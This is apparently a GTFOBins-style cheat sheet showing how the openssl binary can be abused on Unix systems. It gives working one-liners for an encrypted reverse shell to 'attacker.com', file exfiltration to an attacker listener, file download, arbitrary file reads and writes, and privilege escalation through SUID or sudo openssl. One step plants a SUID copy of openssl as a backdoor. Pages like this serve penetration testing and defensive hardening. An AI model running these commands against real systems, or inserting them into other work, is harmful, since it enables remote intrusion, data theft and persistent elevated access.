.. / openssl

Star

• Reverse shell
• File upload
• File download
• File write
• File read
• SUID
• Sudo

Reverse shell

It can send back a reverse shell to a listening attacker to open a remote network access.

• To receive the shell run the following on the attacker box:

  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
  

  Communication between attacker and target will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s

File upload

It can exfiltrate files on the network.

• To collect the file run the following on the attacker box:

  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save
  

  Send a file to a TCP port, transmission will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  LFILE=file_to_send
  openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE"

File download

It can download remote files.

• To send the file run the following on the attacker box:

  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send
  

  Fetch a file from a TCP port, transmission will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  LFILE=file_to_save
  openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"

File write

It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.

• LFILE=file_to_write
  echo DATA | openssl enc -out "$LFILE"

• LFILE=file_to_write
  TF=$(mktemp)
  echo "DATA" > $TF
  openssl enc -in "$TF" -out "$LFILE"

File read

It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.

• LFILE=file_to_read
  openssl enc -in "$LFILE"

SUID

It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian that allow the default sh shell to run with SUID privileges.

• To receive the shell run the following on the attacker box:

  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
  

  Communication between attacker and target will be encrypted.

  sudo sh -c 'cp $(which openssl) .; chmod +s ./openssl'
  
  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s

• sudo sh -c 'cp $(which openssl) .; chmod +s ./openssl'
  
  LFILE=file_to_write
  echo DATA | openssl enc -out "$LFILE"

Sudo

It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.

• To receive the shell run the following on the attacker box:

  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
  

  Communication between attacker and target will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s